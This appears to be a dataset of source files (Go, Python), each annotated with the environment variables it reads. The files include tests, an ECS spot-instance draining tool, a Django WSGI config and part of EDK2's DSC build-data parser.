FilterImages: []image.Name{"foo"},
FilterTags: []image.Tag{"1.2.3"},
},
registry.RegInvImage{
"foo": {
"sha256:000": {"latest", "1.2.3"},
"sha256:222": {"3.0"},
},
"bar": {
"sha256:111": {"latest", "1.2.3"},
},
},
registry.RegInvImage{
"foo": {
"sha256:000": {"1.2.3"},
},
},
nil,
},
}
for _, test := range tests {
gotRii, gotErr := manifest.ApplyFilters(&test.inputOptions, test.inputRii)
require.Equal(t, test.expectedRii, gotRii)
if test.expectedErr != nil {
require.Equal(t, test.expectedErr.Error(), gotErr.Error())
} else {
require.Equal(t, test.expectedErr, gotErr)
}
}
}
|
[
"\"PWD\""
] |
[] |
[
"PWD"
] |
[]
|
["PWD"]
|
go
| 1 | 0 | |
tests/systemtest_mce.py
|
"""Integration test to check mce performance"""
import numpy as np
np.warnings.filterwarnings('ignore') # noqa
import os
os.environ['PYQTGRAPH_QT_LIB'] = 'PyQt5' # noqa
import time
import sys
import os.path as op
from PyQt5 import QtCore, QtGui
from cognigraph.helpers.brainvision import read_fif_data
from cognigraph.pipeline import Pipeline
from cognigraph.nodes import sources, processors, outputs
from cognigraph import TIME_AXIS
from cognigraph.gui.window import GUIWindow
app = QtGui.QApplication(sys.argv)
pipeline = Pipeline()
cur_dir = '/home/dmalt/Code/python/cogni_submodules'
test_data_path = cur_dir + '/tests/data/'
print(test_data_path)
sim_data_fname = 'raw_sim_nobads.fif'
# sim_data_fname = 'Koleno.fif'
# fwd_fname = 'dmalt_custom_lr-fwd.fif'
fwd_fname = 'dmalt_custom_mr-fwd.fif'
# fwd_fname = 'sample_1005-eeg-oct-6-fwd.fif'
surf_dir = '/home/dmalt/mne_data/MNE-sample-data/subjects/sample/surf'
fwd_path = op.join(test_data_path, fwd_fname)
sim_data_path = op.join(test_data_path, sim_data_fname)
source = sources.FileSource(file_path=sim_data_path)
source.loop_the_file = True
source.MAX_SAMPLES_IN_CHUNK = 10000
pipeline.source = source
# Processors
preprocessing = processors.Preprocessing(collect_for_x_seconds=30)
pipeline.add_processor(preprocessing)
linear_filter = processors.LinearFilter(lower_cutoff=8.0, upper_cutoff=12.0)
pipeline.add_processor(linear_filter)
inverse_model = processors.MCE(forward_model_path=fwd_path, snr=1.0)
# inverse_model = processors.InverseModel(method='MNE', forward_model_path=fwd_path, snr=1.0)
pipeline.add_processor(inverse_model)
envelope_extractor = processors.EnvelopeExtractor()
# pipeline.add_processor(envelope_extractor)
# Outputs
global_mode = outputs.BrainViewer.LIMITS_MODES.GLOBAL
three_dee_brain = outputs.BrainViewer(
limits_mode=global_mode, buffer_length=10, surfaces_dir=surf_dir)
pipeline.add_output(three_dee_brain)
# pipeline.add_output(outputs.LSLStreamOutput())
# pipeline.initialize_all_nodes()
signal_viewer = outputs.SignalViewer()
pipeline.add_output(signal_viewer, input_node=linear_filter)
window = GUIWindow(pipeline=pipeline)
window.init_ui()
window.setWindowFlags(QtCore.Qt.WindowStaysOnTopHint)
window.show()
base_controls = window._controls._base_controls
source_controls = base_controls.source_controls
processors_controls = base_controls.processors_controls
outputs_controls = base_controls.outputs_controls
source_controls.source_type_combo.setValue(source_controls.SOURCE_TYPE_PLACEHOLDER)
linear_filter_controls = processors_controls.children()[0]
envelope_controls = processors_controls.children()[2]
# envelope_controls.disabled.setValue(True)
three_dee_brain_controls = outputs_controls.children()[0]
three_dee_brain_controls.threshold_slider.setValue(50)
# three_dee_brain_controls.limits_mode_combo.setValue('Local')
window.initialize()
# start_s, stop_s = 80, 100
# with source.not_triggering_reset():
# source.data, _ = read_fif_data(sim_data_path, time_axis=TIME_AXIS, start_s=start_s, stop_s=stop_s)
class AsyncUpdater(QtCore.QRunnable):
_stop_flag = False
def __init__(self):
super(AsyncUpdater, self).__init__()
self.setAutoDelete(False)
def run(self):
self._stop_flag = False
while not self._stop_flag:
start = time.time()
pipeline.update_all_nodes()
end = time.time()
# Force sleep to update at 10Hz
if end - start < 0.1:
time.sleep(0.1 - (end - start))
def stop(self):
self._stop_flag = True
pool = QtCore.QThreadPool.globalInstance()
updater = AsyncUpdater()
is_paused = True
def toggle_updater():
global pool
global updater
global is_paused
if is_paused:
is_paused = False
pool.start(updater)
else:
is_paused = True
updater.stop()
pool.waitForDone()
window.run_button.clicked.connect(toggle_updater)
window.show()
updater.stop()
pool.waitForDone()
sys.exit(app.exec_())
# def run():
# pipeline.update_all_nodes()
# # print(pipeline.source._samples_already_read / 500)
# timer = QtCore.QTimer()
# timer.timeout.connect(run)
# frequency = pipeline.frequency
# output_frequency = 10
# # timer.setInterval(1000. / frequency * 500)
# timer.setInterval(1000. / output_frequency)
# source.loop_the_file = False
# source.MAX_SAMPLES_IN_CHUNK = 10000
# # envelope.disabled = True
# if __name__ == '__main__':
# import sys
# timer.start()
# timer.stop()
# TODO: this runs when in iPython. It should not.
# Start Qt event loop unless running in interactive mode or using pyside.
# if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
# sys.exit(QtGui.QApplication.instance().exec_())
|
[] |
[] |
[
"PYQTGRAPH_QT_LIB"
] |
[]
|
["PYQTGRAPH_QT_LIB"]
|
python
| 1 | 0 | |
main.go
|
package main
import (
"fmt"
"net/http"
"time"
"io/ioutil"
"encoding/json"
"log"
"os"
// "strings"
"github.com/aws/aws-sdk-go/aws"
"github.com/aws/aws-sdk-go/aws/session"
"github.com/aws/aws-sdk-go/service/ecs"
)
type instance struct {
Cluster string `json:"Cluster"`
Arn string `json:"ContainerInstanceArn"`
}
func getContainerInstance() instance {
client := http.Client{
Timeout: time.Second * 2, // Maximum of 2 secs
}
containerInstance := instance{}
req, err := http.NewRequest(http.MethodGet, "http://0.0.0.0:51678/v1/metadata", nil)
if err != nil {
log.Fatal(err)
}
res, getErr := client.Do(req)
if getErr != nil {
fmt.Println(getErr)
return containerInstance
// log.Fatal(getErr)
}
body, readErr := ioutil.ReadAll(res.Body)
if readErr != nil {
log.Fatal(readErr)
}
jsonErr := json.Unmarshal(body, &containerInstance)
if jsonErr != nil {
log.Fatal(jsonErr)
}
fmt.Printf("HTTP: %s\n", res.Status)
return containerInstance
}
func isStopping() bool {
client := http.Client{
Timeout: time.Second * 2, // Maximum of 2 secs
}
ec2_url := os.Getenv("EC2METADATA_URL")
if ec2_url == "" {
ec2_url = "169.254.169.254"
}
url := fmt.Sprintf("http://%s/latest/meta-data/spot/termination-time", ec2_url)
req, err := http.NewRequest(http.MethodGet, url, nil)
if err != nil {
log.Fatal(err)
}
res, getErr := client.Do(req)
if getErr != nil {
log.Fatal(getErr)
}
fmt.Println("Checking spot status...")
return res.StatusCode == 200
}
func drain(containerInstance instance) {
// ecs stuff
svc := ecs.New(session.New())
input := &ecs.UpdateContainerInstancesStateInput {
ContainerInstances: []*string{aws.String(containerInstance.Arn)},
Cluster: aws.String(containerInstance.Cluster),
Status: aws.String("DRAINING"),
}
req, resp := svc.UpdateContainerInstancesStateRequest(input)
err := req.Send()
if err != nil { // resp is now filled
fmt.Println(resp)
fmt.Println(err)
}
fmt.Println("Successfully drained the instance")
os.Exit(0)
}
func main() {
containerInstance := getContainerInstance()
for containerInstance == (instance{}) {
fmt.Println("Cannot communicate with ECS Agent. Retrying...")
time.Sleep(time.Second * 5)
containerInstance = getContainerInstance()
}
fmt.Printf("Found ECS Container Instance %s\n", containerInstance.Arn)
fmt.Printf("on the %s cluster.\n", containerInstance.Cluster)
for true {
if isStopping() {
fmt.Println("Spot instance is being acted upon. Doing something")
fmt.Printf("Drain this %s\n", containerInstance.Arn)
// drain this one
drain(containerInstance)
}
time.Sleep(time.Second * 5)
}
}
|
[
"\"EC2METADATA_URL\""
] |
[] |
[
"EC2METADATA_URL"
] |
[]
|
["EC2METADATA_URL"]
|
go
| 1 | 0 | |
aiven/resource_connection_pool_test.go
|
package aiven
import (
"fmt"
"github.com/aiven/aiven-go-client"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/acctest"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/resource"
"github.com/hashicorp/terraform-plugin-sdk/v2/terraform"
"os"
"testing"
)
func init() {
resource.AddTestSweepers("aiven_connection_pool", &resource.Sweeper{
Name: "aiven_connection_pool",
F: sweepConnectionPools,
})
}
func sweepConnectionPools(region string) error {
client, err := sharedClient(region)
if err != nil {
return fmt.Errorf("error getting client: %s", err)
}
conn := client.(*aiven.Client)
projects, err := conn.Projects.List()
if err != nil {
return fmt.Errorf("error retrieving a list of projects : %s", err)
}
for _, project := range projects {
if project.Name == os.Getenv("AIVEN_PROJECT_NAME") {
services, err := conn.Services.List(project.Name)
if err != nil {
return fmt.Errorf("error retrieving a list of services for a project `%s`: %s", project.Name, err)
}
for _, service := range services {
list, err := conn.ConnectionPools.List(project.Name, service.Name)
if err != nil {
if err.(aiven.Error).Status == 403 {
continue
}
return fmt.Errorf("error retrieving a list of connection pools for a service `%s`: %s", service.Name, err)
}
for _, pool := range list {
err = conn.ConnectionPools.Delete(project.Name, service.Name, pool.PoolName)
if err != nil {
return fmt.Errorf("error destroying connection pool `%s` during sweep: %s", pool.PoolName, err)
}
}
}
}
}
return nil
}
func TestAccAivenConnectionPool_basic(t *testing.T) {
resourceName := "aiven_connection_pool.foo"
rName := acctest.RandStringFromCharSet(10, acctest.CharSetAlphaNum)
resource.ParallelTest(t, resource.TestCase{
PreCheck: func() { testAccPreCheck(t) },
ProviderFactories: testAccProviderFactories,
CheckDestroy: testAccCheckAivenConnectionPoolResourceDestroy,
Steps: []resource.TestStep{
{
Config: testAccConnectionPoolResource(rName),
Check: resource.ComposeTestCheckFunc(
testAccCheckAivenConnectionPoolAttributes("data.aiven_connection_pool.pool"),
resource.TestCheckResourceAttr(resourceName, "project", os.Getenv("AIVEN_PROJECT_NAME")),
resource.TestCheckResourceAttr(resourceName, "service_name", fmt.Sprintf("test-acc-sr-%s", rName)),
resource.TestCheckResourceAttr(resourceName, "database_name", fmt.Sprintf("test-acc-db-%s", rName)),
resource.TestCheckResourceAttr(resourceName, "username", fmt.Sprintf("user-%s", rName)),
resource.TestCheckResourceAttr(resourceName, "pool_name", fmt.Sprintf("test-acc-pool-%s", rName)),
resource.TestCheckResourceAttr(resourceName, "pool_size", "25"),
resource.TestCheckResourceAttr(resourceName, "pool_mode", "transaction"),
),
},
},
})
}
func testAccConnectionPoolResource(name string) string {
return fmt.Sprintf(`
data "aiven_project" "foo" {
project = "%s"
}
resource "aiven_service" "bar" {
project = data.aiven_project.foo.project
cloud_name = "google-europe-west1"
plan = "startup-4"
service_name = "test-acc-sr-%s"
service_type = "pg"
maintenance_window_dow = "monday"
maintenance_window_time = "10:00:00"
pg_user_config {
pg_version = 11
}
}
resource "aiven_service_user" "foo" {
service_name = aiven_service.bar.service_name
project = data.aiven_project.foo.project
username = "user-%s"
}
resource "aiven_database" "foo" {
project = aiven_service.bar.project
service_name = aiven_service.bar.service_name
database_name = "test-acc-db-%s"
}
resource "aiven_connection_pool" "foo" {
service_name = aiven_service.bar.service_name
project = data.aiven_project.foo.project
database_name = aiven_database.foo.database_name
username = aiven_service_user.foo.username
pool_name = "test-acc-pool-%s"
pool_size = 25
pool_mode = "transaction"
}
data "aiven_connection_pool" "pool" {
project = aiven_connection_pool.foo.project
service_name = aiven_connection_pool.foo.service_name
pool_name = aiven_connection_pool.foo.pool_name
depends_on = [aiven_connection_pool.foo]
}
`, os.Getenv("AIVEN_PROJECT_NAME"), name, name, name, name)
}
func testAccCheckAivenConnectionPoolAttributes(n string) resource.TestCheckFunc {
return func(s *terraform.State) error {
r := s.RootModule().Resources[n]
a := r.Primary.Attributes
if a["project"] == "" {
return fmt.Errorf("expected to get a project name from Aiven")
}
if a["service_name"] == "" {
return fmt.Errorf("expected to get a service_name from Aiven")
}
if a["pool_name"] == "" {
return fmt.Errorf("expected to get a pool_name from Aiven")
}
if a["database_name"] == "" {
return fmt.Errorf("expected to get a database_name from Aiven")
}
if a["username"] == "" {
return fmt.Errorf("expected to get a username from Aiven")
}
if a["pool_size"] != "25" {
return fmt.Errorf("expected to get a correct pool_size from Aiven")
}
if a["pool_mode"] != "transaction" {
return fmt.Errorf("expected to get a correct pool_mode from Aiven")
}
return nil
}
}
func testAccCheckAivenConnectionPoolResourceDestroy(s *terraform.State) error {
c := testAccProvider.Meta().(*aiven.Client)
// loop through the resources in state, verifying each connection pool is destroyed
for _, rs := range s.RootModule().Resources {
if rs.Type != "aiven_connection_pool" {
continue
}
projectName, serviceName, databaseName := splitResourceID3(rs.Primary.ID)
pool, err := c.ConnectionPools.Get(projectName, serviceName, databaseName)
if err != nil {
if err.(aiven.Error).Status != 404 {
return err
}
}
if pool != nil {
return fmt.Errorf("connection pool (%s) still exists", rs.Primary.ID)
}
}
return nil
}
|
[
"\"AIVEN_PROJECT_NAME\"",
"\"AIVEN_PROJECT_NAME\"",
"\"AIVEN_PROJECT_NAME\""
] |
[] |
[
"AIVEN_PROJECT_NAME"
] |
[]
|
["AIVEN_PROJECT_NAME"]
|
go
| 1 | 0 | |
examples/image/delete/go/deleteAnUploadedImage.go
|
package example
import (
"fmt"
"os"
"github.com/micro/services/clients/go/image"
)
// Delete an image previously uploaded.
func DeleteAnUploadedImage() {
imageService := image.NewImageService(os.Getenv("MICRO_API_TOKEN"))
rsp, err := imageService.Delete(&image.DeleteRequest{
Url: "https://cdn.m3ocontent.com/micro/images/micro/41e23b39-48dd-42b6-9738-79a313414bb8/cat.png",
})
fmt.Println(rsp, err)
}
|
[
"\"MICRO_API_TOKEN\""
] |
[] |
[
"MICRO_API_TOKEN"
] |
[]
|
["MICRO_API_TOKEN"]
|
go
| 1 | 0 | |
tests/unit/test_logging.py
|
import os
from jina.logging.base import get_logger
def test_logging_message():
os.environ['JINA_LOG_VERBOSITY'] = 'success'
logger = get_logger('test_logger')
logger.debug('this is test debug message')
logger.info('this is test info message')
logger.success('this is test success message')
logger.warning('this is test warning message')
logger.error('this is test error message')
logger.critical('this is test critical message')
|
[] |
[] |
[
"JINA_LOG_VERBOSITY"
] |
[]
|
["JINA_LOG_VERBOSITY"]
|
python
| 1 | 0 | |
config/wsgi.py
|
"""
WSGI config for coruscant-django project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
import sys
from pathlib import Path
from django.core.wsgi import get_wsgi_application
# This allows easy placement of apps within the interior
# coruscant_django directory.
ROOT_DIR = Path(__file__).resolve(strict=True).parent.parent
sys.path.append(str(ROOT_DIR / "coruscant_django"))
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "config.settings.production"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "config.settings.production")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
|
[] |
[] |
[
"DJANGO_SETTINGS_MODULE"
] |
[]
|
["DJANGO_SETTINGS_MODULE"]
|
python
| 1 | 0 | |
BaseTools/Source/Python/Workspace/DscBuildData.py
|
## @file
# This file is used to create a database used by build tool
#
# Copyright (c) 2008 - 2019, Intel Corporation. All rights reserved.<BR>
# (C) Copyright 2016 Hewlett Packard Enterprise Development LP<BR>
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
## Platform build information from DSC file
#
# This class is used to retrieve information stored in database and convert them
# into PlatformBuildClassObject form for easier use for AutoGen.
#
from __future__ import print_function
from __future__ import absolute_import
from Common.StringUtils import *
from Common.DataType import *
from Common.Misc import *
from types import *
from Common.Expression import *
from CommonDataClass.CommonClass import SkuInfoClass
from Common.TargetTxtClassObject import TargetTxt
from Common.ToolDefClassObject import ToolDef
from .MetaDataTable import *
from .MetaFileTable import *
from .MetaFileParser import *
from .WorkspaceCommon import GetDeclaredPcd
from Common.Misc import AnalyzeDscPcd
from Common.Misc import ProcessDuplicatedInf,RemoveCComments,ArrayIndex
import re
from Common.Parsing import IsValidWord
from Common.VariableAttributes import VariableAttributes
import Common.GlobalData as GlobalData
import subprocess
from functools import reduce
from Common.Misc import SaveFileOnChange
from Workspace.BuildClassObject import PlatformBuildClassObject, StructurePcd, PcdClassObject, ModuleBuildClassObject
from collections import OrderedDict, defaultdict
def _IsFieldValueAnArray (Value):
Value = Value.strip()
if Value.startswith(TAB_GUID) and Value.endswith(')'):
return True
if Value.startswith('L"') and Value.endswith('"') and len(list(Value[2:-1])) > 1:
return True
if Value[0] == '"' and Value[-1] == '"' and len(list(Value[1:-1])) > 1:
return True
if Value[0] == '{' and Value[-1] == '}':
return True
if Value.startswith("L'") and Value.endswith("'") and len(list(Value[2:-1])) > 1:
return True
if Value[0] == "'" and Value[-1] == "'" and len(list(Value[1:-1])) > 1:
return True
return False
PcdValueInitName = 'PcdValueInit'
PcdMainCHeader = '''
/**
DO NOT EDIT
FILE auto-generated
**/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <PcdValueCommon.h>
'''
PcdMainCEntry = '''
int
main (
int argc,
char *argv[]
)
{
return PcdValueMain (argc, argv);
}
'''
PcdMakefileHeader = '''
#
# DO NOT EDIT
# This file is auto-generated by build utility
#
'''
WindowsCFLAGS = 'CFLAGS = $(CFLAGS) /wd4200 /wd4034 /wd4101 '
LinuxCFLAGS = 'BUILD_CFLAGS += -Wno-pointer-to-int-cast -Wno-unused-variable '
PcdMakefileEnd = '''
!INCLUDE $(BASE_TOOLS_PATH)\Source\C\Makefiles\ms.common
LIBS = $(LIB_PATH)\Common.lib
!INCLUDE $(BASE_TOOLS_PATH)\Source\C\Makefiles\ms.app
'''
AppTarget = '''
all: $(APPFILE)
$(APPFILE): $(OBJECTS)
%s
'''
PcdGccMakefile = '''
MAKEROOT ?= $(EDK_TOOLS_PATH)/Source/C
LIBS = -lCommon
'''
variablePattern = re.compile(r'[\t\s]*0[xX][a-fA-F0-9]+$')
SkuIdPattern = re.compile(r'^[a-zA-Z_][a-zA-Z0-9_]*$')
## regular expressions for finding decimal and hex numbers
Pattern = re.compile('^[1-9]\d*|0$')
HexPattern = re.compile(r'0[xX][0-9a-fA-F]+$')
## Regular expression for finding header file inclusions
from AutoGen.GenMake import gIncludePattern
## Find dependencies for one source file
#
# By searching recursively "#include" directive in file, find out all the
# files needed by given source file. The dependecies will be only searched
# in given search path list.
#
# @param SearchPathList The list of search path
#
# @retval list The list of files the given source file depends on
#
def GetDependencyList(FileStack, SearchPathList):
DepDb = dict()
DependencySet = set(FileStack)
while len(FileStack) > 0:
F = FileStack.pop()
FullPathDependList = []
CurrentFileDependencyList = []
if F in DepDb:
CurrentFileDependencyList = DepDb[F]
else:
try:
Fd = open(F, 'r')
FileContent = Fd.read()
except BaseException as X:
EdkLogger.error("build", FILE_OPEN_FAILURE, ExtraData=F + "\n\t" + str(X))
finally:
if "Fd" in dir(locals()):
Fd.close()
if len(FileContent) == 0:
continue
try:
if FileContent[0] == 0xff or FileContent[0] == 0xfe:
FileContent = FileContent.decode('utf-16')
else:
FileContent = FileContent.decode()
except:
# The file is not txt file. for example .mcb file
continue
IncludedFileList = gIncludePattern.findall(FileContent)
for Inc in IncludedFileList:
Inc = Inc.strip()
Inc = os.path.normpath(Inc)
CurrentFileDependencyList.append(Inc)
DepDb[F] = CurrentFileDependencyList
CurrentFilePath = os.path.dirname(F)
PathList = [CurrentFilePath] + SearchPathList
for Inc in CurrentFileDependencyList:
for SearchPath in PathList:
FilePath = os.path.join(SearchPath, Inc)
if not os.path.exists(FilePath):
continue
if FilePath not in DependencySet:
FileStack.append(FilePath)
FullPathDependList.append(FilePath)
break
DependencySet.update(FullPathDependList)
DependencyList = list(DependencySet) # remove duplicate ones
return DependencyList
class DscBuildData(PlatformBuildClassObject):
# dict used to convert PCD type in database to string used by build tool
_PCD_TYPE_STRING_ = {
MODEL_PCD_FIXED_AT_BUILD : TAB_PCDS_FIXED_AT_BUILD,
MODEL_PCD_PATCHABLE_IN_MODULE : TAB_PCDS_PATCHABLE_IN_MODULE,
MODEL_PCD_FEATURE_FLAG : TAB_PCDS_FEATURE_FLAG,
MODEL_PCD_DYNAMIC : TAB_PCDS_DYNAMIC,
MODEL_PCD_DYNAMIC_DEFAULT : TAB_PCDS_DYNAMIC,
MODEL_PCD_DYNAMIC_HII : TAB_PCDS_DYNAMIC_HII,
MODEL_PCD_DYNAMIC_VPD : TAB_PCDS_DYNAMIC_VPD,
MODEL_PCD_DYNAMIC_EX : TAB_PCDS_DYNAMIC_EX,
MODEL_PCD_DYNAMIC_EX_DEFAULT : TAB_PCDS_DYNAMIC_EX,
MODEL_PCD_DYNAMIC_EX_HII : TAB_PCDS_DYNAMIC_EX_HII,
MODEL_PCD_DYNAMIC_EX_VPD : TAB_PCDS_DYNAMIC_EX_VPD,
}
# dict used to convert part of [Defines] to members of DscBuildData directly
_PROPERTY_ = {
#
# Required Fields
#
TAB_DSC_DEFINES_PLATFORM_NAME : "_PlatformName",
TAB_DSC_DEFINES_PLATFORM_GUID : "_Guid",
TAB_DSC_DEFINES_PLATFORM_VERSION : "_Version",
TAB_DSC_DEFINES_DSC_SPECIFICATION : "_DscSpecification",
# TAB_DSC_DEFINES_OUTPUT_DIRECTORY : "_OutputDirectory",
# TAB_DSC_DEFINES_SUPPORTED_ARCHITECTURES : "_SupArchList",
# TAB_DSC_DEFINES_BUILD_TARGETS : "_BuildTargets",
TAB_DSC_DEFINES_SKUID_IDENTIFIER : "_SkuName",
# TAB_DSC_DEFINES_FLASH_DEFINITION : "_FlashDefinition",
TAB_DSC_DEFINES_BUILD_NUMBER : "_BuildNumber",
TAB_DSC_DEFINES_MAKEFILE_NAME : "_MakefileName",
TAB_DSC_DEFINES_BS_BASE_ADDRESS : "_BsBaseAddress",
TAB_DSC_DEFINES_RT_BASE_ADDRESS : "_RtBaseAddress",
# TAB_DSC_DEFINES_RFC_LANGUAGES : "_RFCLanguages",
# TAB_DSC_DEFINES_ISO_LANGUAGES : "_ISOLanguages",
}
# used to compose dummy library class name for those forced library instances
_NullLibraryNumber = 0
## Constructor of DscBuildData
#
# Initialize object of DscBuildData
#
# @param FilePath The path of platform description file
# @param RawData The raw data of DSC file
# @param BuildDataBase Database used to retrieve module/package information
# @param Arch The target architecture
# @param Platform (not used for DscBuildData)
# @param Macros Macros used for replacement in DSC file
#
def __init__(self, FilePath, RawData, BuildDataBase, Arch=TAB_ARCH_COMMON, Target=None, Toolchain=None):
self.MetaFile = FilePath
self._RawData = RawData
self._Bdb = BuildDataBase
self._Arch = Arch
self._Target = Target
self._Toolchain = Toolchain
self._ToolChainFamily = None
self._Clear()
self.WorkspaceDir = os.getenv("WORKSPACE") if os.getenv("WORKSPACE") else ""
self.DefaultStores = None
self.SkuIdMgr = SkuClass(self.SkuName, self.SkuIds)
@property
def OutputPath(self):
if os.getenv("WORKSPACE"):
return os.path.join(os.getenv("WORKSPACE"), self.OutputDirectory, self._Target + "_" + self._Toolchain, PcdValueInitName)
else:
return os.path.dirname(self.DscFile)
## XXX[key] = value
def __setitem__(self, key, value):
self.__dict__[self._PROPERTY_[key]] = value
## value = XXX[key]
def __getitem__(self, key):
return self.__dict__[self._PROPERTY_[key]]
## "in" test support
def __contains__(self, key):
return key in self._PROPERTY_
## Set all internal used members of DscBuildData to None
def _Clear(self):
self._Header = None
self._PlatformName = None
self._Guid = None
self._Version = None
self._DscSpecification = None
self._OutputDirectory = None
self._SupArchList = None
self._BuildTargets = None
self._SkuName = None
self._PcdInfoFlag = None
self._VarCheckFlag = None
self._FlashDefinition = None
self._Prebuild = None
self._Postbuild = None
self._BuildNumber = None
self._MakefileName = None
self._BsBaseAddress = None
self._RtBaseAddress = None
self._SkuIds = None
self._Modules = None
self._LibraryInstances = None
self._LibraryClasses = None
self._Pcds = None
self._DecPcds = None
self._BuildOptions = None
self._ModuleTypeOptions = None
self._LoadFixAddress = None
self._RFCLanguages = None
self._ISOLanguages = None
self._VpdToolGuid = None
self._MacroDict = None
self.DefaultStores = None
## Get current effective macros
@property
def _Macros(self):
if self._MacroDict is None:
self._MacroDict = {}
self._MacroDict.update(GlobalData.gPlatformDefines)
self._MacroDict.update(GlobalData.gGlobalDefines)
self._MacroDict.update(GlobalData.gCommandLineDefines)
return self._MacroDict
## Get architecture
@property
def Arch(self):
return self._Arch
@property
def Dir(self):
return self.MetaFile.Dir
## Retrieve all information in [Defines] section
#
# (Retrieving all [Defines] information in one-shot is just to save time.)
#
def _GetHeaderInfo(self):
RecordList = self._RawData[MODEL_META_DATA_HEADER, self._Arch]
for Record in RecordList:
Name = Record[1]
# items defined _PROPERTY_ don't need additional processing
# some special items in [Defines] section need special treatment
if Name == TAB_DSC_DEFINES_OUTPUT_DIRECTORY:
self._OutputDirectory = NormPath(Record[2], self._Macros)
if ' ' in self._OutputDirectory:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in OUTPUT_DIRECTORY",
File=self.MetaFile, Line=Record[-1],
ExtraData=self._OutputDirectory)
elif Name == TAB_DSC_DEFINES_FLASH_DEFINITION:
self._FlashDefinition = PathClass(NormPath(Record[2], self._Macros), GlobalData.gWorkspace)
ErrorCode, ErrorInfo = self._FlashDefinition.Validate('.fdf')
if ErrorCode != 0:
EdkLogger.error('build', ErrorCode, File=self.MetaFile, Line=Record[-1],
ExtraData=ErrorInfo)
elif Name == TAB_DSC_PREBUILD:
PrebuildValue = Record[2]
if Record[2][0] == '"':
if Record[2][-1] != '"':
EdkLogger.error('build', FORMAT_INVALID, 'Missing double quotes in the end of %s statement.' % TAB_DSC_PREBUILD,
File=self.MetaFile, Line=Record[-1])
PrebuildValue = Record[2][1:-1]
self._Prebuild = PrebuildValue
elif Name == TAB_DSC_POSTBUILD:
PostbuildValue = Record[2]
if Record[2][0] == '"':
if Record[2][-1] != '"':
EdkLogger.error('build', FORMAT_INVALID, 'Missing double quotes in the end of %s statement.' % TAB_DSC_POSTBUILD,
File=self.MetaFile, Line=Record[-1])
PostbuildValue = Record[2][1:-1]
self._Postbuild = PostbuildValue
elif Name == TAB_DSC_DEFINES_SUPPORTED_ARCHITECTURES:
self._SupArchList = GetSplitValueList(Record[2], TAB_VALUE_SPLIT)
elif Name == TAB_DSC_DEFINES_BUILD_TARGETS:
self._BuildTargets = GetSplitValueList(Record[2])
elif Name == TAB_DSC_DEFINES_SKUID_IDENTIFIER:
if self._SkuName is None:
self._SkuName = Record[2]
if GlobalData.gSKUID_CMD:
self._SkuName = GlobalData.gSKUID_CMD
elif Name == TAB_DSC_DEFINES_PCD_INFO_GENERATION:
self._PcdInfoFlag = Record[2]
elif Name == TAB_DSC_DEFINES_PCD_VAR_CHECK_GENERATION:
self._VarCheckFlag = Record[2]
elif Name == TAB_FIX_LOAD_TOP_MEMORY_ADDRESS:
try:
self._LoadFixAddress = int (Record[2], 0)
except:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS %s is not valid dec or hex string" % (Record[2]))
elif Name == TAB_DSC_DEFINES_RFC_LANGUAGES:
if not Record[2] or Record[2][0] != '"' or Record[2][-1] != '"' or len(Record[2]) == 1:
EdkLogger.error('build', FORMAT_NOT_SUPPORTED, 'language code for RFC_LANGUAGES must have double quotes around it, for example: RFC_LANGUAGES = "en-us;zh-hans"',
File=self.MetaFile, Line=Record[-1])
LanguageCodes = Record[2][1:-1]
if not LanguageCodes:
EdkLogger.error('build', FORMAT_NOT_SUPPORTED, 'one or more RFC4646 format language code must be provided for RFC_LANGUAGES statement',
File=self.MetaFile, Line=Record[-1])
LanguageList = GetSplitValueList(LanguageCodes, TAB_SEMI_COLON_SPLIT)
# check whether there is empty entries in the list
if None in LanguageList:
EdkLogger.error('build', FORMAT_NOT_SUPPORTED, 'one or more empty language code is in RFC_LANGUAGES statement',
File=self.MetaFile, Line=Record[-1])
self._RFCLanguages = LanguageList
elif Name == TAB_DSC_DEFINES_ISO_LANGUAGES:
if not Record[2] or Record[2][0] != '"' or Record[2][-1] != '"' or len(Record[2]) == 1:
EdkLogger.error('build', FORMAT_NOT_SUPPORTED, 'language code for ISO_LANGUAGES must have double quotes around it, for example: ISO_LANGUAGES = "engchn"',
File=self.MetaFile, Line=Record[-1])
LanguageCodes = Record[2][1:-1]
if not LanguageCodes:
EdkLogger.error('build', FORMAT_NOT_SUPPORTED, 'one or more ISO639-2 format language code must be provided for ISO_LANGUAGES statement',
File=self.MetaFile, Line=Record[-1])
if len(LanguageCodes) % 3:
EdkLogger.error('build', FORMAT_NOT_SUPPORTED, 'bad ISO639-2 format for ISO_LANGUAGES',
File=self.MetaFile, Line=Record[-1])
LanguageList = []
for i in range(0, len(LanguageCodes), 3):
LanguageList.append(LanguageCodes[i:i + 3])
self._ISOLanguages = LanguageList
elif Name == TAB_DSC_DEFINES_VPD_TOOL_GUID:
#
# try to convert GUID to a real UUID value to see whether the GUID is format
# for VPD_TOOL_GUID is correct.
#
try:
uuid.UUID(Record[2])
except:
EdkLogger.error("build", FORMAT_INVALID, "Invalid GUID format for VPD_TOOL_GUID", File=self.MetaFile)
self._VpdToolGuid = Record[2]
elif Name in self:
self[Name] = Record[2]
# set _Header to non-None in order to avoid database re-querying
self._Header = 'DUMMY'
## Retrieve platform name
@property
def PlatformName(self):
if self._PlatformName is None:
if self._Header is None:
self._GetHeaderInfo()
